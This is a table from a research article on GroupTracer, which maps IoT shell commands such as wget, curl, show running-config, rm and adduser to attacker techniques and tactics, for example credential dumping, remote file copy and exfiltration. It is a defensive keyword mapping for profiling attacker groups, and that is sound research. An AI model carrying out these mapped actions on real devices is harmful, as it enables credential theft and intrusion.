Research Article
GroupTracer: Automatic Attacker TTP Profile Extraction and Group Cluster in Internet of Things
Table 1
Some examples of mapping from commands to TTP profiles.
| | Command | Technique | Tactic |
| | 1st knowledge base | | show running-config | Credential dumping | Credential access | | show startup-config | Credential dumping | Credential access |
| | 2nd knowledge base | | ftpget | Remote file copy | Lateral movement | | wget | Remote file copy | Lateral movement | | curl | Remote file copy | Lateral movement | | rcp | Remote file copy | Lateral movement | | copy | Remote file copy | Lateral movement | | show archive config | Credentials in files | Credential access | | show history | Input capture | Collection | | show logging | Input capture | Collection | | tar | Data compressed | Exfiltration | | zip | Data compressed | Exfiltration | | rar | Data compressed | Exfiltration | | shutdown | System shutdown/reboot | Impact | | reboot | System shutdown/reboot | Impact | | del | File deletion | Defense evasion | | rm | File deletion | Defense evasion | | adduser | Create account | Persistence | | usermod | Account manipulation | Persistence | | groupadd | Account manipulation | Persistence | | dir | File and directory discovery | Discovery | | ls | File and directory discovery | Discovery | | cd | File and directory discovery | Discovery | | echo | Data from local system | Collection | | cat | Data from local system | Collection | | more | Data from local system | Collection | | pwd | Data from local system | Collection | | whoami | Data from local system | Collection |
|
|
